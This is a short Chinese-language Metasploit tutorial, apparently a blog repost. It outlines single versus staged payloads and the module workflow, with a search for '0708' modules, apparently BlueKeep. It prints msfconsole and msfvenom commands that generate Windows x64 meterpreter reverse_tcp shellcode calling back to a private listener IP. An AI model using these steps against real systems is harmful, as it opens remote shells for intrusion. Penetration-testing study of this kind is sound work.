Metasploit(二)

漏洞攻击

MSF攻击模式

  1. single:直接发送一个利用脚本
  2. stage:先发送一个stager建立连接,再发送一个stage利用脚本
    在这里插入图片描述
    在这里插入图片描述

攻击步骤

  1. search name:0708–搜索带有0708字样的模块
  2. use exploit模块 --使用模块
  3. show options – 查看配置
  4. set … – 设置配置
  5. check --漏洞检测(可省略)
  6. use – 使用exploit模块攻击
    Metasploit(二)_第1张图片
    Metasploit(二)_第2张图片

Metasploit生成shellcode

在msfconsole生成

use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.124.26
generate -f python

Metasploit(二)_第3张图片

在msfvenom中生成

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST 192.168.124.26 LPORT 4444 -f python -v user_payload

Metasploit(二)_第4张图片
去除多余0x00字节
Metasploit(二)_第5张图片

你可能感兴趣的:(工具,扫描测试工具)